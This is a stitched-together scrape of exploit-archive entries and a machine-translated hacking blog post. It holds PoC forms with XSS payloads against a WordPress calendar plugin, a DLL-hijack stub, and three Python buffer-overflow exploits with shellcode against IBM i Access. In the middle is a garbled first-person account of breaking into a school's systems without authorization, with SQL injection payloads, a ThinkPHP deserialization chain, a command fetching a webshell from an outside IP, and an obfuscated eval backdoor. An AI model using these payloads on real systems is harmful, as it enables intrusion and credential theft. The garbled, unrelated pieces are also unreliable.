source: https://www.securityfocus.com/bid/62313/info
eTransfer Lite is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible.
eTransfer Lite 1.0 is vulnerable; other versions may also be affected.
<bq>The following files are hosted live from the iPad's Docs folder.</bq><p><b>Images:<br><br></b>
<a href="http://www.example.com/%3C[PERSISTENT INJECTED SCRIPT CODE!]%3Es2.png"><[PERSISTENT INJECTED SCRIPT
CODE!]">s2.png</a>
( 51.8 Kb, 2013-08-25 02:09:25 +0000)<br />
<a href="a2b642e7de.jpg">a2b642e7de.jpg</a>
( 238.0 Kb, 2013-08-25 02:08:13 +0000)<br />
</p><br><br><br><hr><br><br><br><center><form
action="" method="post" enctype="multipart/form-data" name="form1"
id="form1"><label>Upload file to iPad <input type="file"
name="file" id="file" /></label><label> <input
type="submit" name="button" id="button" value="Submit"
/></label></form></center><br><br><br>Powered
By <a
href=http://www.example.com</a></body></html></iframe></a></p></body></html>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863294407
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
0x01はじめに
流行により、学校のYibanアプリはチェックインシステムを追加しました。これには、毎日朝の検査と午後の検査が必要です。忘れてしまうと、レビューする何千もの単語があります。
私はこの「形式主義」に深く不満を感じています。私はたまたまサイバーセキュリティチームを設立したので、それを操作する準備をしました。
0x02スポット
基本情報収集についてはあまり言いません
したがって、異なるシステムは複数のサーバーを使用します
それは完全に解決できないようです。コアシステムを獲得するには、さまざまなシステムとサーバーの素晴らしい学校システムの浸透の旅が必要です。
次に、コアシステムにタッチします
まず、「Yiban」システムのホームページを開き、これがどのように見えるかです
開発者がTPフレームワークを使用し、さまざまなTP注射をテストしたことを確認することは難しくありません。
RCEのペイロードは失敗に終わりました、そして、安全性の認識はそれほど悪くないようです
ドメイン名の下のホームページは、機能的なポイントや情報なしで完全にエラー報告ページです
saying sayingにあるように、情報収集の品質は浸透の成功または失敗を直接決定するので、私たちは決して不注意であってはなりません。
最初にファズの第1レベルのディレクトリに来てみましょう
結果は非常に優れており、多くのカタログと機能ポイントがあります。
次に、各第1レベルのディレクトリのセカンダリディレクトリを曖昧にし続け、ドメイン名の下に展開されている機能ポイントを常に探求しました。
第1レベルのディレクトリが多すぎるため、詳細については写真には行きません。
機能的なポイントを理解した後、ズボンを脱いで乾燥を開始します
0x03メンタルヘルスシステムの浸透(IISショートファイル名ポートポート - ブラストニューログインポートアプロード)
第1レベルのカタログを爆破し、爆破します
http://xxx.xxx.edu.cn/psyこのパス
心理教育の健康システムが展開され、ミドルウェアがIISであることがわかった
ただし、メンタルヘルスシステムのログインには検証コードメカニズムがあり、検証コードを識別するのは簡単ではありません
私はすぐにIISショートファイル名機能について考えました
次に、IISショートファイル名ディレクトリスキャンツールを使用します
(https://github.com/lijiejie/iis_shortname_scanner)スキャン用
他のシステムの古いログインポートを取得します
http://xxx.xxx.edu.cn/psy/login2.aspx
図に示されているように、検証コードメカニズムはありません
直接げっぷクラスター爆弾型爆発
他のシステムの弱いパスワード管理者AA123456を正常に取得しました
ただし、古いシステムの他のページが削除されており、通常はバックグラウンドにログインできません
しかし、古いシステムと新しいシステムで使用されているのと同じデータベースが推測されています
新しいシステムへのアクセス
http://xxx.xxx.edu.cn/psy/login.aspx
パスワード管理者、AA123456を使用して、正常にログインします
バックグラウンドでアップロードポイントを検索します
アップロードポイントはです
http://xxx.xxx.edu.cn/psy/scalemanage/scaleedit.aspx?scalelistid=1
スケールプラットフォームに追加されたトピックは、任意のファイルにアップロードされます
(そうです、このアップロードポイント.それは非常に隠されていると言えます.それを見つけるのに長い時間がかかりました)
ASPXのアップロードは不可解にジャンプします。 ASPは解析せず、ASMX馬を直接通過します。
AWVS 10のデバッグモジュールを介してコマンドを実行します
許可はネットサービスです
CobaltStrikeを使用して、PowerShellを直接POWERSHELLに移動します
パッチは死んでいるようです。
さまざまな地元の権利昇進が一度開始されましたが、役に立たなかった
comコンポーネントは、ジャガイモが装着された後も育てることさえできません。最初にこれをしましょう。右を上げる場合は、追加してください。
メンタルヘルスシステムは、初期の買収を発表しました
0x04ライブブロードキャストシステムインターフェイスインジェクション
ライブブロードキャストシステムに入った後、使用する意味がなく、開発はまだ完了していないことがわかりました。
しかし、げっぷで、私はajaxインターフェイスのリクエストを見つけました、
HTTPリクエストは次のように:です
post /index.php/live/index/seat_ajax.html http/1.1
host: xxx.xxx.edu.cn
Content-Length: 24
Accept:/
Origin:http://xxx.xxx.edu.cn
X-Requested With: xmlhttprequest
user-agent: mozilla/5.0(linux; u; android 5.1; zh-cn; 1501_m02 build/lmy47d)applewebkit/534.30(khtml、ygecko)バージョン/4.0 ucbrowser/11.0.0.0.818 U3/0.8.0モバイルSaf/534.30
Content-Type:アプリケーション/x-www-form-urlencoded; charset=utf-8
Referer:http://xxx.xxx.edu.cn/index.php/live/index/seat?place_id=10active_id=20
Accept-Encoding: gzip、deflate
Accept-Language: ZH-CN、ZH; Q=0.9、EN; Q=0.8
Cookie3360 ASP.NET_SESSIONID=S0CLWRGINZ0RW3X0SMTWTSGG; phpsessid=7985bf0a5f38e5922a651ac1f4ef9b1a; phpsessid=7985bf0a5f38e5922a651ac1f4ef9b1a
Connection:閉じます
place_id=10active_id=20
sqliペイロードを見つけるためにファズをします
両方のIDパラメーターには、組合注入があります
ペイロードを構築します
)null、null、null、null、null()、null、null、null、null、null、null、null、null、null、null、null、null、null、null、null、null、null、null、null - null、null、null、null、null、null、null、
図に示すように、current_user情報が正常に取得されました。
'_root@10.40.0.22
ペイロードを構築します
place_id=10)null、null、null、null、group_concat(schema_name)、null、null、null、null、null、null、null、null、null、null、null、null、null、null、null from information _schema.schemata-- ne neqyactive_id=20
ここでは、他のテーブル、列、データを実証しません。文を書いても大丈夫です、それはとても簡単です。
その後、他のシステムに多くのライブラリが関与していることがわかりましたが、私が最も望んでいたコアシステムのライブラリは見つかりませんでした。
0x05鈍いb64アップロード
ファズ関数ポイントの後、私は許可なしに写真をアップロードできる場所を見つけました
http://xxx.xxx.edu.cn/v4/public/weui/demo/form12.html
data:image/jpegが発見されたときにjpeg画像をアップロードします
データをImage/PHPに直接変更し、アップロードされたコンテンツBase64をエンコードして送信します
GetShellが成功し、システムの許可、権利のエスカレーションが救われました
0x06コアシステム素晴らしい浸透(nday desarialization +コマンド実行バイパス +条件付き競争の膨張)
検索、寒くて捨てられた、悲惨で悲惨な、最終的に「Yiban」を制御するコアシステムを見つけました
http://xxx.xxx.edu.cn/v4/public/index.php/admin/login.html?s=admin/api.update/tree
勝利はあなたの目の前にあります.あなたは眠らないとしても彼を殺さなければなりません
あらゆる種類のファズとさまざまな操作が一緒に配置されましたが、私はそれが役に立たないことがわかりました、そして、私はまだ毎日行きませんでした。
あきらめるべきですか?不可能、これは私たちのスタイルではありません
ページJSを注意深くチェックしていたとき、私はそのような興味深い情報を見つけました
私の目が明るくなりました、いまいましいシンカドミン、前に洗練されたnadがありました、それを手配しましょう!
http://xxx.xxx.edu.cn/v4/public/index.php/admin/login.html?s=admin/api.update/tree
Postdata:
ルール=a%3a2%3a%7bi%3a0%3bo%3a17%3a%22think%5cmodel%5cpivot%22%3a11%3a%7bs%3a21%3a%22%00think%5cmodel%00 lazysave%22% 3a1%3bs%3a19%3a%22%00think%5cmodel%00 exists%22%3bb%3a1%3bs%3a13%3a%22%00think%5cmodel% 2%00%2a%00 -connection%22%3bs%3a5%3a%22Mysql%22%3bs%3a7%3a%22%00%2a%00Name%22%3BO%3a17%3a%22thi nk%5cmodel%5cpivot%22%3a11%3a%7bs%3a21%3a%22%00think%5cmodel%00 lazysave%22%3bb%3a1%3bs%3a19%3a %22%00think%5cmodel%00 Exists%22%3bb%3a1%3bs%3a13%3a%22%00%2a%00connection%22%3bs%3a5%3a%22mys QL%22%3bs%3a7%3a%22%00%2a%00Name%22%3bs%3a0%3a%22%22%3bs%3a21%3a%22%00think%5cmodel%00withattr %22%3BA%3a1%3a%7bs%3a4%3a%22test%22%3bs%3a6%3a%22System%22%3b%7ds%3a9%3a%22%00%2a%00hidden%22 %3BA%3a1%3a%7bs%3a4%3a%22test%22%3bs%3a3%3a%22123%22%3b%7ds%3a17%3a%22%00think%5cmodel%00data% 22%3BA%3a1%3a%7bs%3a4%3a%22test%22%3bs%3a6%3a%22whoami%22%3b%7ds%3a12%3a%22%00%2a%00withent %22%3bb%3a0%3bs%3a18%3a%22%00think%5cmodel%00フォース%22%3bb%3a1%3bs%3a8%3a%22%00%2a Ba%3a0%3a%7b%7ds%3a9%3a%22%00%2a%00schema%22%3ba%3a0%3a%7b%7d%7ds%3a21%3a%22%00think%5cmodel% 00 withattr%22%3ba%3a1%3a%7bs%3a4%3a%22test%22%3bs%3a6%3a%22%22%3b%7ds%3a9%3a%22%00%2a%00隠し%22%3BA%3a1%3a%7bs%3a4%3a%22test%22%3bs%3a3%3a%22123%22%3b%7ds%3a17%3a%22%00think%5cmod EL%00DATA%22%3BA%3a1%3a%7bs%3a4%3a%22test%22%3bs%3a6%3a%22whoami%22%3b%7ds%3a12%3a%22%00%2a%00 withevent%22%3bb%3a0%3bs%3a18%3a%22%00think%5cmodel%00force%22%3bb%3a1%3bs%3a8%3a%22%00%2a%00f IELD%22%3BA%3a0%3a%7b%7ds%3a9%3a%22%00%2a%00schema%22%3ba%3a0%3a%7b%7d%7di%3a1%3bi%3a123%3b%7d //hoamiを実行します
以下は、次のように脱審上のポップチェーンです
?php
名前空間思考;
Think \ model \ pivotを使用してください。
抽象クラスモデル{
private $ lazysave=false; # 保存()
private $が存在する=false; #updatedata()
保護された$接続。
保護された$ name; #__toString()conversion.php=pivot
private $ with withattr=[]; #アサート
保護された$ hidden=[];
private $ data=[];
保護$ withevent=false;
private $ force=false;
保護された$ field=[];
保護された$ schema=[];
function __construct(){
$ this-lazysave=true;
$ this-exists=true;
$ this-withevent=false;
$ this-force=true;
$ this-connection='mysql';
$ this-withattr=['test'='system'];
$ this-data=['test'='whoami'];
$ this-hidden=['test'='123'];
$ this-field=[];
$ this-schema=[];
}
}
名前空間Think \ Model;
Think \ Modelを使用してください。
\#モデルは抽象クラスです。その継承クラスを見つけます。ここでは、ピボットクラスを選択します
クラスピボットはモデルを拡張します{
function __construct($ obj=''){
parent:__construct();
$ this-name=$ obj; #$ This-nameは値をサブクラスコンストラクターに入れ、ベースクラス属性を直接配置して成功せずに初期化します
}
}
$ a=new Pivot();
echo urlencode(serialize([new pivot($ a)、123]));
許可はシステムです、ハハハハハハハ、神も私を助けてくれます
しかし、私はEchoコマンドを使用してシェルを書くことに多くの問題に遭遇しました
コマンドはスペースを持つことができず、シェルはコマンドに直接記述されます。そうしないと、エラーが報告されます。
スペースは +に変換され、バックエンドはそれを認識できません
永続的な手動テストの後、 /\はスペースの限界をバイパスできることがわかります
次に、スプライシングコマンドを使用して、書き込み検出をバイパスすることを実現します
しかし、ターゲットマシンにはWAFがあり、数秒後に通常のウェブシェルが殺されます。
なぜだめですか?条件付き競争を通じて直接殺さずにウェブシェルをダウンロードしてください
コンストラクターは、条件付き競争を通じて殺すことなくシェルをダウンロードします
echo/^^?phps1.phpecho/file_put_contents( 's2.php'、file_get_contents( 'http://49.x.x.x:8080/shell.txt'));^gt; gt; gt; s2.php
シェルの内容は次のとおりです
?php
関数テスト($ php_c0d3){
$ password='skr'; //envpwd
$ cr=preg_filter( '/\ s+/'、 ''、 'c h r');
$ bs64=preg_filter( '/\ s+/'、 ''、 'bas e64 _de cod e');
$ gzi=$ cr(103)。$ cr(122)。$ cr(105)。$ cr(110);
$ gzi。=$ cr(102)。$ cr(108)。$ cr(97)。$ cr(116)。$ cr(101);
$ c=$ bs64($ php_c0d3);
$ c=$ gzi($ c);
@eval($ c);
}
$ php_c0d3='s0lny8xl1vavzkjnyslilc5w11ebuex'。
'5RSMA1RXCKGWZEWM2KVFBROGHRSEH0UOGVLISUC'。
'yztqmiaatumvqspfnny1wqarli1wbpraxi1lleh'。
'a2exrgdszrwaa==';
テスト($ php_c0d3);
?ポップチェーンの降下により、ポストダタを生成します
直接電話してください
http://xxx.xxx.edu.cn/v4/public/s2.php
パスワードSKR
直接取ってください
最後に、このチェックイン、レイトコール、出席コアシステム、管理者がライブラリに入り、管理者のパスワードを復号化しました
くそー、あなたはまだ私にレビューを書いてほしいですか?行ってたわごとを食べてください
source: https://www.securityfocus.com/bid/62269/info
The Event Easy Calendar plugin for WordPress is prone to multiple cross-site request-forgery vulnerabilities.
Exploiting these issues may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.
Event Easy Calendar 1.0.0 is vulnerable; other versions may also be affected.
f of Concept
========================
Add Customer
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="data-table_length" value="10">
<input type="hidden" name="radioservice" value="1">
<input type="hidden" name="hdServiceTypeDDL" value="">
<input type="hidden" name="uxTxtControl1" value="new () user com">
<input type="hidden" name="uxTxtControl2" value="<script>alert(1)</script>">
<input type="hidden" name="hiddeninputname" value="">
<input type="hidden" name="hiddeninputname" value="">
<input type="hidden" name="uxHdnTotalCost" value="0.00">
<input type="hidden" name="param" value="addNewCustomer">
<input type="hidden" name="action" value="bookingsLibrary">
<input type="submit" value="Add Customer">
</form>
Update Customer
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="data-table_length" value="10">
<input type="hidden" name="radioservice" value="2">
<input type="hidden" name="hdServiceTypeDDL" value="">
<input type="hidden" name="uxTxtControl1" value="new () user com">
<input type="hidden" name="uxTxtControl2" value="NewUser">
<input type="hidden" name="hiddeninputname" value="">
<input type="hidden" name="hiddeninputname" value="">
<input type="hidden" name="uxHdnTotalCost" value="100.00">
<input type="hidden" name="customerId" value="3">
<input type="hidden" name="uxCustomerEmail" value="new () user com">
<input type="hidden" name="param" value="upDateCustomer">
<input type="hidden" name="action" value="bookingsLibrary">
<input type="submit" value="Update Customer">
</form>
New Booking
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="altField" value="2013-08-15">
<input type="hidden" name="serviceId" value="2">
<input type="hidden" name="customerId" value="5">
<input type="hidden" name="uxCouponCode" value="">
<input type="hidden" name="uxNotes" value="">
<input type="hidden" name="bookingTime" value="900">
<input type="hidden" name="param" value="frontEndMutipleDates">
<input type="hidden" name="action" value="bookingsLibrary">
<input type="submit" value="New Booking">
</form>
Add Service
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="uxServiceColor" value="#00ff00">
<input type="text" name="uxServiceName" value="CSRF service<script>alert(1)</script>">
<input type="hidden" name="uxServiceCost" value="0">
<input type="hidden" name="uxServiceType" value="0">
<input type="hidden" name="uxMaxBookings" value="1">
<input type="hidden" name="uxFullDayService" value="">
<input type="hidden" name="uxMaxDays" value="1">
<input type="hidden" name="uxCostType" value="0">
<input type="hidden" name="uxServiceHours" value="00">
<input type="hidden" name="uxServiceMins" value="30">
<input type="hidden" name="uxStartTimeHours" value="9">
<input type="hidden" name="uxStartTimeMins" value="0">
<input type="hidden" name="uxStartTimeAMPM" value="AM">
<input type="hidden" name="uxEndTimeHours" value="5">
<input type="hidden" name="uxEndTimeMins" value="0">
<input type="hidden" name="uxEndTimeAMPM" value="PM">
<input type="hidden" name="param" value="addService">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Add Service">
</form>
Add Block Out
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="uxExceptionsServices" value="4">
<input type="hidden" name="uxExceptionsIntervals" value="1">
<input type="hidden" name="uxExceptionsRepeatDay" value="1">
<input type="hidden" name="uxExceptionsStartsOn" value="">
<input type="hidden" name="uxExceptionsStartTimeHours" value="09">
<input type="hidden" name="uxExceptionsStartTimeMins" value="00">
<input type="hidden" name="uxExceptionsStartTimeAMPM" value="AM">
<input type="hidden" name="uxExceptionsEndTimeHours" value="05">
<input type="hidden" name="uxExceptionsEndTimeMins" value="00">
<input type="hidden" name="uxExceptionsEndTimeAMPM" value="PM">
<input type="hidden" name="uxExceptionsDay" value="0">
<input type="hidden" name="uxExceptionsDayEndsOn" value="">
<input type="hidden" name="uxExceptionsWeekDay1" value="Sun">
<input type="hidden" name="uxExceptionsWeekDay2" value="Wed">
<input type="hidden" name="uxExceptionsRepeatWeeks" value="9">
<input type="hidden" name="uxExceptionsWeekStartsOn" value="2013-08-22">
<input type="hidden" name="uxExceptionsWeekStartTimeHours" value="09">
<input type="hidden" name="uxExceptionsWeekStartTimeMins" value="00">
<input type="hidden" name="uxExceptionsWeekStartTimeAMPM" value="AM">
<input type="hidden" name="uxExceptionsWeekEndTimeHours" value="05">
<input type="hidden" name="uxExceptionsWeekEndTimeMins" value="00">
<input type="hidden" name="uxExceptionsWeekEndTimeAMPM" value="PM">
<input type="hidden" name="uxExceptionsWeek" value="0">
<input type="hidden" name="uxExceptionsWeekEndsOn" value="">
<input type="hidden" name="param" value="insertExceptionWeeks">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Add Block Out">
</form>
Add Cupon
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="uxDefaultCoupon" value="XSS<script>alert('xss')</script>">
<input type="hidden" name="uxValidFrom" value="2013-08-15">
<input type="hidden" name="uxValidUpto" value="2013-08-22">
<input type="hidden" name="uxAmount" value="50">
<input type="hidden" name="uxDdlAmountType" value="1">
<input type="hidden" name="uxApplicableOnAllProducts" value="1">
<input type="hidden" name="uxDdlBookingServices" value="4">
<input type="hidden" name="param" value="addCoupons">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Add Cupon">
</form>
Default Settings
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="uxDdlDefaultCurrency" value="United States Dollar">
<input type="hidden" name="uxDdlDefaultCountry" value="United States of America">
<input type="hidden" name="uxDefaultDateFormat" value="0">
<input type="hidden" name="uxDefaultTimeFormat" value="0">
<input type="hidden" name="uxDefaultTimeZone" value="-5.0">
<input type="hidden" name="uxServiceDisplayFormat" value="0">
<input type="hidden" name="param" value="updateGeneralSettings">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Default Settings">
</form>
Reminder Settings
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="uxReminderSettings" value="1">
<input type="hidden" name="uxReminderInterval" value="1 hour">
<input type="hidden" name="param" value="UpdateReminderSettings">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Reminder Settings">
</form>
PayPal Settings
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
Email: <input type="text" name="uxMerchantEmailAddress" placeholder="enter your PayPal email here">
<input type="hidden" name="uxPayPal" value="1">
<input type="hidden" name="uxPayPalUrl" value="https://paypal.com/cgi-bin/webscr";>
<input type="hidden" name="uxThankyouPageUrl" value="http://google.com";>
<input type="hidden" name="uxCancellationUrl" value="http://google.com";>
<input type="hidden" name="param" value="UpdatePaymentGateway">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="PayPal Settings">
</form>
Mailchimp Settings
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="uxMailChimp" value="1">
<input type="hidden" name="uxMailChimpApiKey" value="12345678">
<input type="hidden" name="uxMailChimpUniqueId" value="87654321">
<input type="hidden" name="uxDoubleOptIn" value="false">
<input type="hidden" name="uxWelcomeEmail" value="false">
<input type="hidden" name="param" value="UpdateAutoResponder">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Mailchimp Settings">
</form>
Facebook Connect
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="uxFacebookConnect" value="1">
<input type="hidden" name="uxFacebookAppId" value="12345678">
<input type="hidden" name="uxFacebookSecretKey" value="87654321">
<input type="hidden" name="param" value="UpdateFacebookSocialMedia">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Facebook Connect">
</form>
Auto Approve
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="uxAutoApprove" value="1">
<input type="hidden" name="param" value="AutoApprove">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Auto Approve">
</form>
Delete All Bookings
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="param" value="DeleteAllBookings">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Delete All Bookings">
</form>
Restore Factory Settings
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="param" value="RestoreFactorySettings">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Restore Factory Settings">
</form>
// source: https://www.securityfocus.com/bid/62261/info
Watchguard Server Center is prone to a local privilege-escalation vulnerability.
Local attackers can exploit this issue to gain SYSTEM privileges. Successful exploits will result in the complete compromise of affected computers.
Watchguard Server Center 11.7.4 and 11.7.3 are vulnerable; other versions may also be affected.
#include <windows.h>
#define DLL_EXPORT __declspec(dllexport)
#ifdef __cplusplus
extern "C"
{
#endif
void DLL_EXPORT wgpr_library_get()
{
WinExec("calc",0);
}
#ifdef __cplusplus
}
#endif
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/IBMI-CLIENT-ACCESS-BUFFER-OVERFLOW.txt
Vendor:
==============
www.ibm.com
Product:
====================================================
IBM i Access for Windows
Release 7.1 of IBM i Access for Windows is affected
Vulnerability Type:
=======================
Stack Buffer Overflow
Arbitrary Code Exec
CVE Reference:
==============
CVE-2015-2023
Vulnerability Details:
=====================
IBM i Access for Windows is vulnerable to a buffer overflow. A local
attacker could overflow a buffer and execute arbitrary code on the Windows PC.
client Access has ability to receive remote commands via "Cwbrxd.exe"
service
Ref: http://www-01.ibm.com/support/docview.wss?uid=nas8N1019253
"Incoming remote command was designed for running non-interactive commands
and programs on a PC", therefore a remote attacker could execute arbitrary code on the system.
Remediation/Fixes
The issue can be fixed by obtaining and applying the Service Pack SI57907.
The buffer overflow vulnerability can be remediated by applying Service
Pack SI57907.
The Service Pack is available at:
http://www-03.ibm.com/systems/power/software/i/access/windows_sp.html
Workarounds and Mitigations
None known
CVSS Base Score: 4.4
CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/104044 for the
current score
CVSS Environmental Score*: Undefined
CVSS Vector: (AV:L/AC:M/Au:N/C:P/I:P/A:P)
Exploit code(s):
==============================================================================
Three python POC scriptz follow that exploitz various component of IBM i
Access.
1) Exploits "ftdwprt.exe", direct EIP overwrite
import struct,os,subprocess
pgm="C:\\Program Files (x86)\\IBM\\Client Access\\AFPViewr\\ftdwprt.exe "
#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
# use jmp or call esp in FTDBT.dll under AFPviewer for Client Access
# we find ---> 0x638091df : jmp esp | {PAGE_EXECUTE_READ} [FTDBDT.dll]
ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.05.04.00
(C:\Program Files (x86)\IBM\Client Access\AFPViewr\FTDBDT.dll)
rp=struct.pack('<L', 0x638091FB)
payload="A" * 1043+rp+sc+"\x90"*20
subprocess.Popen([pgm, payload], shell=False) #<----1043 bytes outside of
debugger use 1044 in debugger.
==================================
2) Exploits "ftdwinvw.exe", direct EIP overwrite
import struct,os,subprocess
pgm="C:\\Program Files (x86)\\IBM\\Client Access\\AFPViewr\\ftdwinvw.exe "
#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
#payload="A"*1044+"RRRR"+"\x90"*10+"B"*100 #Test EIP
rp=struct.pack('<L', 0x638091fb) #CALL ESP (0x638091fb) FTDBDT.dll
payload="A"*1044+rp+"\x90"*10+sc #KABOOM!!!
subprocess.Popen([pgm, payload], shell=False)
registers dump...
EAX 0000040B
ECX 0044AAB8 ASCII "AAAAAAAAA...
EDX 7F17E09F
EBX 00000000
ESP 0018E5B8
EBP 41414141
ESI 005A9FB9 ASCII "AAAAAAAAA...
EDI 0044E94C ftdwinvw.0044E94C
EIP 52525252 <----------BOOM!
C 0 ES 002B 32bit 0(FFFFFFFF)
P 0 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
3) Exploits "PCSWS.exe", structured exeception handler (SEH) overwrite
pgm="C:\\Program Files (x86)\\IBM\\Client Access\\Emulator\\pcsws.exe "
#ctrl EIP at 1340 bytes, ESP points to RETURN to ntdll.770BB499 so we will
jump 8 bytes to our SC
#as ESP points to our SC 8 bytes after!
jmp="\xEB\x06"+"\x90"*2
#payload="A"*1336+"BBBB" #Test
#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
rp=struct.pack('<L', 0x678c1e49) #pop pop ret 0x67952486
PCSW32X.dll
payload="A"*1332+jmp+rp+sc+"\x90"*10 #KABOOOOOOOOOOOOOOOOOOM!
subprocess.Popen([pgm, payload], shell=False)
register dump...
0018FF6C 41414141 AAAA
0018FF70 41414141 AAAA
0018FF74 41414141 AAAA
0018FF78 41414141 AAAA Pointer to next SEH record
0018FF7C 42424242 BBBB SE handler
0018FF80 004C0400 .L. pcsws.004C0400
Disclosure Timeline:
====================================
Vendor Notification: May 21, 2015
November 18, 2015 : Public Disclosure
Exploitation Technique:
=======================
Local / Remote
Severity Level:
================
High
Description:
=================================================================================
Request Method(s): [+] local or remote commands via "Cwbrxd.exe"
service
Vulnerable Product: [+] IBM i Access for Windows Release 7.1
Affected Area(s): [+] OS
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
* Exploit Title: WordPress Users Ultra Plugin [Unrestricted File Upload]
* Discovery Date: 2015/10/27
* Public Disclosure Date: 2015/12/01
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://usersultra.com
* Software Link: https://wordpress.org/plugins/users-ultra/
* Version: 1.5.50
* Tested on: WordPress 4.3.1
* Category: webapps
Description
================================================================================
WordPress plugin `Users Ultra Plugin` suffers for an unrestricted file upload vulnerability.
Any user (registered or not) can exploit a misbehavior of the plugin in order to upload csv files to the infected website. Although the plugin checks file extension using an extensions white-list (in this case only csv files are white-listed), no other checks (mime, size etc) are taking place. This alone can expose the infected website to a variety of attacks, please see [OWASP Unrestricted File Upload](https://www.owasp.org/index.php/Unrestricted_File_Upload) to get an idea.
Details
================================================================================
